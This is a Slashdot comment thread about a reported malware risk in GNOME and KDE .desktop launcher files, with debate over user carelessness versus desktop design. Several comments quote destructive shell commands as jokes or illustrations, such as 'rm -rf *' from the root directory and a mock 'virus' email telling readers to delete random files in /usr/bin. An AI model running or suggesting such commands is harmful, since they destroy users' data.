Malware Threat To GNOME and KDE

commandlinegamer writes "foobar posted on his blog recently about 'How to write a Linux virus in 5 easy steps,' detailing potential malware infection risks in the .desktop file format used by GNOME and KDE. This is not a new threat, and it appears to still be a risk, as discussions in 2006 did not seem to come to any firm conclusion on how to deal with the problem." There's a followup on LWN.

Solution

[Spazztastic]

Use Linux... wait, shit. We need a new answer, guys.

Re:Solution

[zappepcs]

The answer is the same one that has been valid for .. well, since the advent of computers. There will always be vulnerabilities. The best you can do is be aware, vigilant, and choose software that has less vulnerabilities and whose writers work hardest to correct the problems fastest. Arguments can be made for or against Linux based on those criteria but it remains a very strong choice over Windows or Apple. The more popular Linux becomes on the desktop, the more chances there will be vulnerabilities. Now is the time for F/OSS coders to start working extra to ensure there are as few as possible.

If you write code, you know that you've left open areas where an exception will cause a problem for any number of reasons. it happens. period. So far, GNU/Linux has cleaned up quickly and well on most things. The struggle continues. That is the answer.

Re:Solution

[Lumpy]

Have a brain when using the PC.

It works for all operating systems. Viruses and Trojans require the user to not think and execute things willy-nilly. Having a brain reduces the infection vectors drastically.

Every "expert" I have met that has been infected was downloading and using warez unsafely. Every regular use I have met that was infected simply clicked yes to every dialog box they did not want to bother reading and understanding.

The OS does not matter, having educated and competent users does. Have to add that competent, I have seen educated users go and click on crap without reading or thinking.. It requires competence.

Re:Solution

[Spazztastic]

Having a brain reduces the infection vectors drastically.

I forgot sarcasm tags when starting this thread, but there's also many other problems outside of "not having a brain." Unpatched flaws in your operating system, people still running IE6 and opening a JPEG with a script embedded, etc. One can be very intelligent at something completely unrelated to computers and still get infected purely because of a popup and an unpatched system.

Not everybody knows to run windows update or to update their Ubuntu installation even if it warns them, because it's usually being inconvenient. Usually it's why I set it to do it automatically for users or they won't.

Re:Solution

[nobodylocalhost]

Finally, year of the openbsd desktop!

Re:Solution

[Ed+Avis]

Have a brain when using the PC.

This has very little to do with user stupidity. Indeed, users should not execute things willy-nilly, but it's surely okay to open a file and look at its contents? If you think that is inherently unsafe then users must be prohibited from receiving email attachments (or downloading from web pages) altogether.

In this case there are no warning dialogues to click through, no unusual steps. All that happens is you save a file and then double-click to open it. There is no way to see in advance that the file is unsafe, and it can adopt any icon and name it wishes, so in the user interface it is *indistinguishable* from a legitimate desktop icon such as the trash can.

It gets a laugh on Slashdot to castigate 'stupid' users, but if the system does not provide users with the information needed to make an informed choice, then the system is at fault.

Re:Solution

[Ed+Avis]

The best you can do is be aware, vigilant, and choose software that has less vulnerabilities and whose writers work hardest to correct the problems fastest.

Which in this case is unlikely to be GNOME or KDE, since this attack has been known for several years and absolutely nothing has been done about it (it's "expected behaviour").

Re:Solution

[Foofoobar]

PEBKAC. Brains are optional. Just ask any Exchange user.

Re:Solution

[zappepcs]

I tried to make it a choice by the end user as to which is less vulnerable. MS products have/had similar issues by length and criticality. So if any and all of your choices can and will have such vulnerabilities, use other criteria for your choice.

On a side note: Worse than having a vulnerability in the code base for several months or years is having it left there intentionally, and marginally worse is when users ignore the patch when it is provided. With Linux patches are free. With Windows products you need to be a legal registered user and/or have paid for updated anti-malware software. Consequently it costs you more to apply fixes for some OSes compared to Linux.

So, in the end it is still down to the user to do their part. No matter what efforts the coders put in, if the user fails the malware will spread.

I'm not apologizing for bugs/problems in Gnome/KDE code. I'm simply saying that such an event only makes it software. When those packages continue to have such errors on a regular schedule and with end effects that MS has tortured the world with, then it's reason to complain.

Re:Solution

[bigstrat2003]

With Linux patches are free.

And they are with Windows as well. Come on, it's more than a bit ridiculous to expect Microsoft to supply patches to people who pirate their software. If you've bought your copy of Windows, patches are free. There may be a bug with validating your copy, but that's also a mistake, not by design.

Re:Solution

[zappepcs]

My poorly stated point is that those pirated copies are not being patched appropriately and thus represent a larger target for malicious software authors, making Windows a little bit less desirable from that point of view.

Re:Solution

[pipatron]

Windows security patches are free for pirated versions of Windows. Don't ask me how I know this...

Re:Solution

[Truekaiser]

At which point one has to have a whole bunch of your friends flood the kde and gnome bug trackers with this bug. followed by sending emails to the dev's with the same exact example code that only fills their desktop with links to said bugs. That should hit them with a clue by 4 to fix the hole.

Re:Solution

[BluenoseJake]

Actually, it makes people who are too cheap to pay for Windows, but to lazy or uninformed to use OSS less desirable, not Windows.

Re:Solution

[Niris]

I don't know, gnome was useful for myself and a few other people I know for transitioning from Windows to Linux. Small steps are a very nice thing, otherwise it's a huge leap going from "right click and more clicking" to sudo apt-get and dd if=/dev/zero of=/dev etc.

Re:Solution

[jank1887]

TRS-80, here we come!

Re:Solution

Remember the Melisa "I Love You" virus that first came out maybe a decade ago?

Ha ha!, I thought, How stupid do you have to be to open a file that is sent to you and all it says is "Hey, look at this picture!".

Certainly, it should be quite suspicious. No comments. No "Hi, how are you.". Plus, the news was already out that you should be very, very careful.

Well, my workplace, which was full of some very talented and bright developers got infected. Our whole network slowed to a crawl as more and more emails were being sent to everyone. I was receiving hundreds of emails each minute. One of our top developers admitted he was the one that caused the infection. He was actually waiting for his friend to send him a file, and when the virus mail came, he clicked on it.

"Using your brain" doesn't always work. I've talked to brilliant developers who found themselves suddenly caught in a phishing scam.

Even I was almost caught. I received a phone message from an 800 number about a problem with my credit card. I called back the 800 number, to find out what the problem was.

The first thing they asked for was my credit card number. My son started screaming at me not to give the number and I relented. We did a Google search and to my surprise, he was right. It was a phishing expedition.

Remember: I wasn't called. I called an 800 number. The person didn't simply answer "Hello", they identified themselves as my credit card issuer without any prompting. If my son didn't stop it, I would have given some stranger who was masquerading as my credit card issuer my credit card number.

The book "The Design of Everyday Things" talks about a software program (pre-Windows) that had the user press the key (sometimes called by the right side of the keyboard on some occasion, and other times, the key by the numeric keypad.

Users were having severe issues. The developers blamed it on the users because the directions clearing distinguished between the two keys. Even the users felt stupid because they felt they should have known better. In the end, a UI designer stepped in and eliminated this distinction between the two keys, and solved the problem.

Sometimes, "Use Your Brain" is simply an excuse to allow bad design to be ignored rather than fixed. If enough users are having difficulties with a certain situation, it isn't enough to castigate them on their lack of intelligence.

Re:Solution

[SanityInAnarchy]

this attack has been known for several years and absolutely nothing has been done about it

I'm curious -- is there any desktop environment which provides the ability to have an icon launch a program, and is not vulnerable to this? Remember all those Windows .PIF file attacks, for example?

Re:Solution

[Rei]

I knew a sysadmin a decade ago who accidentally got infected by one of those email viruses. He immediately recognized it and wanted to look at the source code, but accidentally clicked to run it instead of to view source. Yep, accidents happen. But those kinds of accidents aren't what cause the *majority* of infections.

A bit off topic, but I'll never forget my favorite Linux "email virus":

--------
Subject: LOVE-YOU VIRUS for Linux

I-LOVE-YOU VIRUS for Linux

this one works on the honor system...

1. cd to /usr/bin
2. type ls -l and pick 3 or 4 files at random
3. type rm -f filename for each of the chosen files
4. forward this email to 50 friends also running linux.

Why should Windows users enjoy all the excitement?
--------

Re:Solution

[zenray]

I'm looking to use my old C64. After all, I got plenty of old TV's that won't work without a converter box now.

Re:Solution

[Just+Some+Guy]

Come on, it's more than a bit ridiculous to expect Microsoft to supply patches to people who pirate their software.

Remember that story about vaccinations the other day? Herd immunity is vitally important, and patching illegitimate installations makes the world safer for legitimate users. This in turn goes a way toward improving Microsoft's security reputation to something greater than Swiss cheese.

Re:Solution

[StormReaver]

> There is no way to see in advance that the file is unsafe....

Right-click, open-with...kwrite. Or the operating system-independent method of, "Hmmm..some random, unexpected file appeared in my email. Maybe I shouldn't run it."

1) This is not a virus vector. This is barely classifiable as even a trojan (a program which advertises itself as performing X, but actually performs Y; with Y being something malicious), though can meet the definition under certain tortured logic.

2) This has everything to do with user stupidity. This is not like Windows, where merely clicking the email attachment from within the email program launches the attachment (hell, Outlook has code to automatically execute attachments at the time they're received). This requires the user to manually save the file, then manually execute it. There is no operating system protection that will prevent users from doing something as stupid as explicitly saving and running some random attachment received in email. And before someone starts the, "If this were about Windows..." nonsense, Windows gets a bad wrap because it automatically compromises machines (and does so to the entire system at once) in many, many different ways.

> but if the system does not provide users with the information needed to make an informed choice, then the system is at fault.

Is your blender at fault when you stick your hand inside and turn it on? This has nothing to do with any form of system vulnerability. This mountain-from-a-proton "issue" is the desktop carrying out the user's explicit instructions. I certainly don't want my desktop asking me two or three times whether I'm sure I want to run the application I just told it to run.

There is nothing to see here. This is, and always has been, a user-education issue: don't save and run unexpected attachments you receive in email. On Linux, at least, this kind of stupid user trick can be fixed by erasing the user account and going on with business as usual.

Re:Solution

[CarpetShark]

Every "expert" I have met that has been infected was downloading and using warez unsafely. Every regular use I have met that was infected simply clicked yes to every dialog box they did not want to bother reading and understanding.

For the most part, I agree with you, but the other side of this is that studies have shown Windows machines being owned within 40 minutes of being connected to the net, and I've seen people browsing the web with IE suddenly being infected malware without even realising it. They might well have clicked on something they shouldn't in recent cases -- admittedly, IE seems more secure than it once was --, but the OS should make it clear when something is a webpage, and when something is a native OS dialog, for instance.

Re:Solution

[Ed+Avis]

Yes, I do believe it should be safe to *open* any file from any source. If double-clicking a file to open it is unsafe, that needs to be fixed. Look at the security alerts for free software: a large proportion are things like 'a bug in the file decoding might allow an attacker to overwrite the stack by making a specially crafted PNG file'. These are treated as security holes and fixed, because it must be safe to merely *open* and view a PNG file (or whatever) from any source.

The idea that some files are 'bad files' which you should not even open to look at is a screwed-up view of the world that comes from Windows, where the OS and applications don't usually bother to make any distinction between opening and executing. On a sensible system, there is no reason to be afraid of using email and viewing attachments. I have absolutely no fear about saving any attachment from any source and opening it in emacs to view it. The desktop environment can and should provide the same safety.

To continue your analogy: the bug is that currently, with .desktop files, GNOME doesn't give you any way to see what it is apart from putting it in your mouth. Just as with any other kind of file, it should just display the contents for viewing, and not try to taste it unless the file is explicitly marked executable.

Re:Solution

[Ed+Avis]

The vulnerability is in the way the desktop environment hides information from the user so you have no way (even if you are an experienced and responsible user) to avoid executing the malware. You get an attachment by mail, you just save it to look at it and see what it is (a one-click, and expected-safe operation) but when it appears on the desktop background, it's disguised as something else (the .desktop file can choose any icon and name it wants), and double-clicking to view the file in fact *executes* the code without asking you.

What should happen: you save the file; if you chose to save it to the desktop background it appears there, but because it's not marked executable it will not run when you double-click it. Instead the file contents open in a text editor, or some other fairly boring but safe action.

Re:Solution

[Ed+Avis]

OK, so I exaggerated by saying 'there is no way'. Of course you could always pop up an xterm and view it with emacs, or better, od.

However I'm sure you agree that not every computer user can be expected to right-click and open with kwrite on every file they download, that many are not capable of doing so, and that even the unsophisticated users don't deserve to get pwned.

What is the way to open a file in GNOME? Why, to double-click it. We train users to double-click all the time. Suppose you were teaching your grandma how to use email and receive a file. I bet you would explain to her something like: right-click and choose to save the attachment, and then do you see it in the desktop? OK now double-click to open it...

The user is *not* explicitly executing the file! There is nothing at all explicit in the whole process.

What happens is that the user saves an attachment (which happens to be a .desktop file). On the user's desktop it appears with a filename of 'photograph.jpg' and an icon which is a thumbnail of a photograph. The user then double-clicks it.

Are you seriously saying that if you double-click an icon which shows a filename 'photograph.jpg' and a thumbnail, you have explicitly told the system to execute a command such as 'rm -r *'?

Re:Solution

[Lord+Crc]

Have a brain when using the PC.

It works for all operating systems.

Story from today. My dad calls me because his anti-virus internet protection gizmo thingy on his computer (F-Secure, required by his employer) asked if "tunnel service" could be allowed to connect to the internet.

I was on my way home, so couldn't look it up. I asked where it was located, and it was in something like \Windows\System32\Downloads. Now the "Downloads" directory made me suspicious.

Long story short, IT guys at his work later confirmed that it was safe (part of their VPN/Citrix solution or something).

Now, I consider myself at least an average power user, having programmed for windows since the win3.11 days. Even I had a hard time deciding if this was a "good" or "bad" application.

Now put yourself in the shoes of someone who uses a computer to get things done. Like most people use their cars. How are they to determine if "tunnel service" is good or bad? And how to determine if it's the "good" "tunnel service" and not a trojan with the same name?

Re:Solution

[nurb432]

The real solution is to use a ROM based OS. Once you power down, its gone.

You cant expect the average joe to understand this stuff.

Re:Solution

[JesseMcDonald]

Insightful? Really? Please, just read the article. This isn't about running random scripts received through e-mail attachments -- although even in that case the DE would be at fault if it didn't check the execute bit first. This is about non-executable files which disguise their icon and label and, when opened in the context of a DE, are capable of launching arbitrary code.

Once the file is saved it looks like whatever the creator wanted it to look like, be that an image, a text document, etc. The user doesn't think they're running an application they just received through e-mail. They reasonably think, based on the icon and label shown to them by the DE, that they're opening an inert document.

P.S. I haven't seen any evidence that .desktop files can't be opened directly from an e-mail client. Presumably the client passes the attachment to the DE for processing, in which case the DE probably runs the indicated command just as if the shortcut had been saved and opened explicitly.

Re:Solution

[Thinboy00]

Actually, Ubuntu releases a new version every 6 months, but Ubuntu doesn't charge for the updates!!! ] M$ could learn from that.

Re:Solution

[WarmBeer]

Dunno bout you, but all of my /usr/bin is chmod'ed to 755 [rwxr-xr-x]. Without sudo privileges, I can't delete a thing. Debunked!

Re:Solution

[jonadab]

> You get an attachment by mail, you just save it to look at it and
> see what it is (a one-click, and expected-safe operation)

You do *WHAT*?

> but when it appears on the desktop background

Wait, not only do you deliberately save random unidentified email attachments, you save them to the DESKTOP?

Whatever is wrong with you, it's no little thing.

> What should happen:

What should happen, when you get an email attachment and you do not know what it is, is that you either ignore it, or if you have a certain morbid curiosity you maybe save it in /tmp and look at it in something that will treat it as random data (e.g., a hex editor) or use a file-magic utility to determine what kind of content it has in it.

Under no circumstances should an unidentified email attachment ever get anywhere near your desktop. If you don't understand this, maybe you should let your network administrator run that attachment stripper on the MTA like he keeps threatening to do every time he has to rebuild your workstation.

With that said, I do think .desktop files are an inherently bad idea, although they're pretty irrelevant to me since I don't even have nautilus in my session. It's a resource hog, and I never use it. I haven't had any desire to use a graphical file manager since I discovered tab completion sometime in the nineties. This does mean my background is a plain color instead of a pretty picture, but since I generally have a lot of windows open I never *see* much of the background anyway. Instead of icons on the desktop, I keep launchers on the left-side panel, and in drawers.

Re:Solution

[jonadab]

> The OS does not matter

Well, the OS is certainly not the only or even the primary factor in security. I don't know that I'd go so far as to say it doesn't matter at all.

> Viruses and Trojans require the user to not think and execute things willy-nilly.

Agreed, although in the case of an email attachment, a naively-designed mailreader greatly increases the likelihood that the user will do so. When a sane mailreader (e.g., Pegasus Mail) sees an attachment with a filetype or extension that suggests executable content, and the user tries to save the thing to the filesystem, the MUA presents a big fat scary dialog box with the phrase "VIRUS Warning" in the titlebar, the phrase "Possible VIRUS" in a bold header over the text that explains that the content is executable and potentially dangerous, and with the safe "No" option selected by default.

> Every regular use I have met that was infected simply clicked yes to every
> dialog box they did not want to bother reading and understanding.

It used to be possible to get infected without taking any special action, if you used a certain extremely insecure mailreader whose initials are MSOE and received a dangerous attachment. I *think* this has been cleaned up somewhat now, although of course the users can still launch dangerous attachments if they choose to do so (and I believe it actually lets the user directly *launch* the thing, not just save it).

Re:Solution

[jonadab]

> hell, Outlook has code to automatically execute attachments at the time they're received

Does it still? I thought they'd finally taken that out. (I think it does still make it entirely too easy for the user to launch executable attachments though.)

Re:Solution

[jonadab]

> We train users to double-click all the time. Suppose you were teaching your grandma
> how to use email and receive a file. I bet you would explain to her something like:
> right-click and choose to save the attachment, and then do you see it in the desktop?
> OK now double-click to open it...

No, no, I wouldn't.

In the first place, the desktop would NEVER EVER be the default save location on any computer I'd been close enough to that I could show someone how to do anything on it.

Second, I would give my grandma a mailreader that can display common-format image attachments (.png and .jpg mainly, probably also .gif) right there in the mailreader, so she doesn't have to mess around with saving them just to view them. So then there's no need to teach her how to save attachments, because nobody (except the spammers) needs to send her any kind of attachments other than photographs.

Third, I'd give her a mailreader (Pegasus Mail) that doesn't allow saving executable-format attachments without a big scary "Could be a Virus" warning. Pegasus doesn't alarm on .desktop files, but that's because they aren't executable, or even meaningful, on the operating system Pegasus Mail runs on. It *does* give you the virus warning if you try to save an attached .bat or .scr file, or anything like that. And the default button is the safe one. Security is one of several reasons that Pegasus is the ONLY mailreader I recommend for end users. It's also VERY easy to learn to use, and yet fairly featureful if you start exploring the more advanced functionality. I used it myself until I needed something that would run on platforms other than Windows, and then I switched to Gnus. Gnus is more powerful than Pegasus Mail in some ways (better threading, better editing capabilities, quoted-text rewrapping, and it's MUCH more customizeable), but its filtering system is considerably less advanced, and it doesn't do multi-tasking things as well (like, say, checking for new messages while you're writing a reply), and of course it has too much learning curve for most users.

Re:Solution

[StormReaver]

> Please, just read the article. This isn't about running random scripts received through e-mail attachments....

Did you read the article? The entire article is exactly about running random scripts received through email attachments. The article writer spent several paragraphs talking about exploiting user stupidity by sending these rigged files through email, then goes into a spate of hand-waving about the desktops doing what desktops are supposed to do: execute programs that users launch.

He's revised the article several times to tone down the sensationalism a hair, but is still tap dancing around the fact that this is not a virus. He tries justifying the nonsense by claiming that since the computer-ignorant mainstream press calls these things email viruses, he's not doing anything wrong.

The simple fact remains that this is a user-stupidity attack, and there is no technological solution to it. No widely used Linux email program will execute these things unless explicitly configured to do so by the end-user, so the user has to take several unusual steps to voluntarily open himself up to this "problem". I just double checked KMail and Thunderbird (the two I use), and neither will open ANY class of attachment unless
explicitly configured to do so, and even then the user, not the sender, dictates how the class is to be opened -- regardless of what the Exec line says.

There's no doubt that some ignorant users can be made to go through all the steps necessary to save and execute desktop files that contain malicious scripts, but that is not a system vulnerability. That is a human vulnerability. The KDE and GNOME desktops make every reasonable effort to protect users from unintentionally running software received through email, as do all the Linux email programs I've used over the last 16 years, but the operating system and desktop cannot protect a user from doing stupid things while still being useful.

To summarize: this is not a KDE/GNOME desktop vulnerability. This is a simple educational issue, and it applies equally to all desktop operating systems. Not even Windows, which I despise with a burning passion, is to blame when its users intentionally run arbitrary programs received through email that end up doing something harmful.

Re:Solution

[Mozk]

How do you know this?

Re:Solution

[V!NCENT]

Use e17? Doing it right now :)

Re:Solution

[totally+bogus+dude]

It's a resource hog, and I never use it. I haven't had any desire to use a graphical file manager since I discovered tab completion sometime in the nineties. This does mean my background is a plain color instead of a pretty picture, but since I generally have a lot of windows open I never *see* much of the background anyway. Instead of icons on the desktop, I keep launchers on the left-side panel, and in drawers.

An alternative to having a boring colour is to run your favourite xscreensaver on the root window. At the moment I'm using cwaves, which is similar to having a boring desktop but it's a bit more fun. Others I like as my background are 'strange', 'bouboules' and 'goop'. Just run the screensaver with -root as an argument to get it to draw on the root window.

I don't have nautilus handling the desktop either -- mine tends to end up cluttered in junk because the "Desktop" link in file dialogs is a convenient location to access for any scratch files. (For Gnome users who want to do this, you can use "gTweakUI - Nautilus" to easily disable it without having to know the gconf setting name.)

Re:Solution

[totally+bogus+dude]

(I think it does still make it entirely too easy for the user to launch executable attachments though.)

Huh? The fact that Outlook doesn't let you access executable attachments (.exe, .bat, .lnk, etc.) without hacking the registry is one of the reasons I don't use it. It's a reasonable safety precaution but I find it a bit annoying.

To be certain I just sent myself an .exe, and both Outlook 2003 and 2007 won't let me either run it or save it. It just has a message saying it's "blocked access to the following potentially unsafe attachment" and there is no mechanism to download it or run it whatsoever.

Outlook Express may be a different story, but Outlook has blocked these things for a long time. That's why most viruses send their payload in a zip file instead...

Re:Solution

[briggsl]

I believe the article states that xfce will flag icons that have executable scripts embedded

Re:Solution

[Ed+Avis]

Yeah, you save a file, and you choose to save it to the desktop.

If you think that's a big deal and only a moron would do it, then you should file bug reports against GNOME asking why it doesn't pop up a big warning box 'Do you really want to save this file?' and 'Do you really want to save it to the DESKTOP of all places?'. Because at the moment, these are common operations, ordinary users do them all the time, and there is nothing to inform an ordinary user that they might be dangerous.

What should happen, when you get an email attachment and you do not know what it is, is that you either ignore it, or if you have a certain morbid curiosity you maybe save it in /tmp and look at it in something that will treat it as random data (e.g., a hex editor) or use a file-magic utility to determine what kind of content it has in it.

Are you seriously saying that even 1% of users are able to use a hex editor?

Re:Solution

[Ed+Avis]

Third, I'd give her a mailreader (Pegasus Mail) that doesn't allow saving executable-format attachments without a big scary "Could be a Virus" warning.

That's one way to do it, but it does fall into the trap of 'enumerating badness'. The mail reader cannot possibly know about all file formats that might be executable or dangerous. If your platform is sufficiently screwed up, then pretty much any file can be counted as executable (an old version of Windows Media Player would open a .wav sound file, but then finding that it was actually a Windows executable disguised as a .wav, would *execute* it without further warning).

I think it is also a good idea to fix the platform to reduce the set of files that are dangerous and increase the number that are safe. The Linux desktop actually does a pretty good job here. You can save an executable file and double-click it (assume for a moment you are a naive user who doesn't know what an executable is, which is at least 70% of users) - and this is perfectly safe, because it's won't be executed without the execute bit set on the file. Trying to 'open' it will do just that - open it, not run it - and perhaps it could even be configured to start up that hex editor you mentioned earlier.

In this case, making sure that .desktop files need to have the +x bit set to be executed would move them from the set of dangerous files to the set of safe ones. That is much more foolproof than relying on adding a check to every mail reader and web browser to know that .desktop files should not be saved.

Re:Solution

[hesaigo999ca]

I guess you could run linux from the command line and give up using the X environment

Re:Solution

[mgiuca]

There may be a bug with validating your copy, but that's also a mistake, not by design.

OK well there are no bugs in the Ubuntu Genuine Advantage DRM as far as I know. The Ubuntu servers have never accidentally mistaken me for a pirate.

Re:Solution

[ciderVisor]

similar to having a boring desktop but it's a bit more fun

Hey, I'm sold ! Time to ditch Compiz-Fusion.

Re:Solution

[BenoitRen]

The big patch of every three years, known as the new Windows version, is not free.

Re:Solution

[hmar]

Have a brain when using the PC.

This has very little to do with user stupidity. Indeed, users should not execute things willy-nilly, but it's surely okay to open a file and look at its contents? If you think that is inherently unsafe then users must be prohibited from receiving email attachments (or downloading from web pages) altogether.

In this case there are no warning dialogues to click through, no unusual steps. All that happens is you save a file and then double-click to open it. There is no way to see in advance that the file is unsafe, and it can adopt any icon and name it wishes, so in the user interface it is *indistinguishable* from a legitimate desktop icon such as the trash can.

It gets a laugh on Slashdot to castigate 'stupid' users, but if the system does not provide users with the information needed to make an informed choice, then the system is at fault.

Informed choice: don't open unknown and unrequested attachments. Simple.

Re:Solution

[Ed+Avis]

Informed choice: don't open unknown and unrequested attachments. Simple.

Yes, and by that logic any security vulnerability at all can be waved away: vulnerability in Firefox? don't view dodgy websites. The login box doesn't check passwords correctly? don't allow strangers to sit down at your PC and log in. All good advice, perhaps, but it doesn't remove the need to fix the problem.

In this case, it's well known that worms propagate by sending mail to people in your address book, so the dangerous attachment will probably come from someone you often get messages from. When you save it and view it in Nautilus on on the desktop, it will appear indistinguishable from a JPEG image.

Re:Solution

[s.petry]

So you are saying that any time someone buys a kitchen knife they should get a bodyguard?

Lots of people buy that nice new kitchen knife, then cut their fingers. A body guard may be able to stop them from doing something stupid.

Re:Solution

[JesseMcDonald]

The entire article is exactly about running random scripts received through email attachments.

Mere scripts can't disguise themselves, or trick the DE into doing so for them.

... the user has to take several unusual steps to voluntarily open himself up to this "problem".

These "several steps" consist solely of saving an attachment to the desktop without checking the name. That's hardly an ideal example of "user stupidity".

... there is no technological solution to it.

Really? How about requiring the execute bit? That would trivially solve this class of attack, regardless of whether you consider it a case of "user stupidity" or a bug in the DE.

The simple fact is that the execute bit exists to prevent exactly this situation, and the current implementation of .desktop files opens a gaping hole in that first line of defense. The user should be able to trust their DE, and other applications, to not silently run arbitrary code from any file not marked as a program. It's a vulnerability everywhere else it happens, and it's a vulnerability here as well. Requiring shortcuts to have the execute bit set would eliminate the vulnerability without impacting usability in any way, so why not make that the standard behavior?

Re:Solution

[BluenoseJake]

They can be activated by phone. If you don't have a phone, go to a payphone and write the code the nice lady gives you, then go to your house, and enter it into the computer, using the keyboard. You can check that the numbers are correct by looking at the television like object in front of you. Really, that's the lamest excuse in the book. My XP system was installed so many times that I have to call EVERY TIME, and it always works, and never takes more than 5 minutes.

Re:Solution

[drsmithy]

Does it still? I thought they'd finally taken that out. (I think it does still make it entirely too easy for the user to launch executable attachments though.)

No version of Outlook has ever behaved as GP described by design (bugs are a different matter).

Re:Solution

[PCM2]

Last I checked, the "nice lady" had actually been replaced by an automated system.

Re:Solution

[UncleRage]

Okay...

Pick up a UltraSparc IV+, install Solaris run BeOS inside a VM and load Sweet16 so that you can use AppleWorks to handle your spreadsheet, database and word processing needs (remember to configure at least 1 MB of RAM to get all of the zippy, tasty goodness out of AW!).

Also useful will be a TCP/IP stack for GS/OS so that you can access your properly configured BeOS network stack to pass off necessary bits via VMWare to Solaris so that you can utilize telnet to access a jailed telnet server to route communications to an SSH client on Solaris so that you can utilize PINE for email and Links2.

Should be pretty solid.

You can bypass the screenshots and just shoot some polaroids, or dust off that old betamax camera and post some converted video to animated GIFs to your local Fido node... or Usenet if you're really keeping up to date. ;D

Re:Solution

[jwats0560]

I read all the steps to screw yourself and your linux machine. OK, when you get through you are screwed and someone somewhere is now able to see your files etc. Now some scriptkiddy is sending this 'code' to others on your email list, not through your email, cause it don't work that way on linux email clients, but he has to do it himself or automate it on his machine. Are all those people who receive the 'worm' gonna be 'stupid' too. And every linux computer is gonna be a different challenge when he get to the root password. There may be a few less than intelligent linux users out there but scriptkiddies and crackers are usually a smarter group. The amount of effort to write virus' for windoz is at least a thousand times less than it takes for linux virus'. You usually have to break into each linux box one at a time. They will put forth that kind of effort to break into a server somewhere where they have an avid interest, but not joe smow's desktop..... It is possible to do it, true. Will it ever be a problem, not likely. Jw

Re:Solution

[Allador]

With Windows products you need to be a legal registered user and/or have paid for updated anti-malware software.

This is not true.

If your machine doesnt patch WGA (or whatever its called now) then you cannot use Windows Update or Microsoft Updates.

Automatic Updates still work just fine, as does Automatic Updates through WSUS.

The only thing the pirates lose is the ability to run updates manually with an interface. The machine will still keep patching its pirated self quite happily with Automatic Updates, however.

Re:Solution

[Allador]

You do realize that your example was only true in XP pre-sp2 days, right?

Every windows release since XP sp2 (which was many many years ago) has had the firewall on by default and automatic updates on by default.

The only way to have a windows machine auto-compromised is to explicitly turn off the firewall, and explicitly dont patch the machine, and dont let it patch itself.

Same thing for IE. There are short windows after a vulnerability becomes known (usually when the patch is released) and when people patch where you're vulnerable to drive-by installations.

But in general, you have to be unpatched AND running your IE as admin, neither of which are the default.

Re:Solution

[Allador]

I think its quite arguable that the fact you were browsing the web with IE on a known-unpatched windows system would indicate that you might need a brain.

Keeping a machine fully patched is the single most effective way to defeat malware on windows. Second is to not run as admin. Third is to not use IE.

Looks like you may have failed all of these.

Re:Solution

[zappepcs]

That is not exactly true. It's like saying if people can't afford health care or just don't want to pay for health care and catch bird flu they are getting what they deserve. Whether they deserve it or not the rest of us are suffering from the spread of the flu virus.

Re:Solution

[HAWAT.THUFIR]

What should happen: you save the file; if you chose to save it to the desktop background it appears there, but because it's not marked executable it will not run when you double-click it. Instead the file contents open in a text editor, or some other fairly boring but safe action.

You've exactly described the bug and the solution. -Thufir

Frost piss

[digitalunity]

Interesting article. Cliff notes for those who don't read articles: KDE & Gnome desktop icons can contain malicious commands.

The common defense that "well at least linux malware can't get root privileges" isn't much of a defense. For many users, the most sensitive documents they have are owned by themselves.

Re:Frost piss

[Todd+Knarr]

It does make a big difference in clean-up, though. With the malware not being able to get administrative privileges, it can't get into root's environment. That means that you can log in as root and the malware won't get a chance to take over, and then you can safely use all your scanning and clean-up tools without having the malware disable or circumvent them. Contrast this with how thoroughly rootkits can hide on Windows systems.

It's still dangerous, make no mistake. Once the malware's running locally, it can try local exploits to escalate to root access. But there's a lot fewer of those on Linux systems than on Windows, and they're a lot harder to exploit, and anything that doesn't successfully exploit them will be much easier to detect and remove. This is a significant win compared to Windows.

NB: nothing will protect a system from it's owner's stupidity. If the user insists on being willfully stupid, they're in a position to bypass any and all protections on the system. The only protection is to keep them away from the keyboard.

Re:Frost piss

[Exitar]

Why I'm still worried by a malware that, even without root privileges, runs

cd /
rm -rf *

Re:Frost piss

[Fallingcow]

It does make a big difference in clean-up, though. With the malware not being able to get administrative privileges, it can't get into root's environment. That means that you can log in as root and the malware won't get a chance to take over, and then you can safely use all your scanning and clean-up tools without having the malware disable or circumvent them. Contrast this with how thoroughly rootkits can hide on Windows systems.

Really though, especially if we're talking about my personal desktop or laptop, if I notice any kind of infection I'm just going to format->reinstall. It is not remotely worth my time to verify that the virus did not achieve root privileges when reinstalling will take care of the problem much more quickly and thoroughly.

I've used Linux for years, but I still don't get the "OMG don't run as root!" obsession. I don't run as root exactly (I like being under /home rather than /root) but I give myself nearly-root permissions and remove password prompts from everything that I can. Why? Because I'm the only one who uses my laptop, all the stuff I care about is in my ~/ folder, and the discovery of any virus of any kind whatsoever is going to mean an instant format->reinstall anyway.

On servers? Sure. Multiuser workstations? Sure. At home? Running as a regular user is just way more hassle than it's worth. Oh no! The virus got in to the /boot directory! So what? Who gives a shit about /boot? I care about ~/Music or ~/Downloads far, far more.

Re:Frost piss

[psetzer]

Escaping notice is the most important part of keeping malware on system. After it's found, the question is more about how painful it is to get off the system than whether it's going to get removed. Since modern malware authors want their software to stick around in the background for as long as possible, they just avoid doing anything outrageous and let the zombie send out a trickle of emails.

Experience with Windows users shows that the average end user who's willing to click on something like the author was talking about isn't going to get suspicious and won't suspect something two levels deep in a dot folder with an official/cryptic sounding name. They can be brazen and call it 'smtpmmd' for SMTP mass mailer daemon and it'll still probably slip under the radars of at least a few people who know how to look at their active processes. The only real solution is an automated searching tool and at that point you're doing the same thing as all the Windows AV programs, just with a somewhat easier time of it.

Re:Frost piss

[Todd+Knarr]

I advocate the "Don't run as root." position for two reasons. One, it builds good habits from the start, both for users and for software vendors. It gets users used to running as ordinary users, and conditions them to expect the system to function correctly without administrative privileges except when explicitly doing administrative tasks. We've seen on Windows how many problems keep sticking around simply because of habits users have developed over the years. Inertia works, so put it to good use instead of bad. If you teach users good habits initially, they're likely to stick with them. And it gets software vendors used to living in a world without administrative privileges. When most users expect not to need admin privileges to use software, their reaction to software that expects admin privileges is to go "WTF? Why do you need that again?" and to go with other software if the vendor insists on requiring the user to break their existing habits (users are lazy and don't like changing their ways, remember). That yields a feedback loop: vendors produce software that doesn't require admin privileges because users react badly to stuff that demands admin rights for no good reason, and users react badly to software that demands admin privileges for no good reason because 99% of the software they work with "just works" without admin privileges being needed.

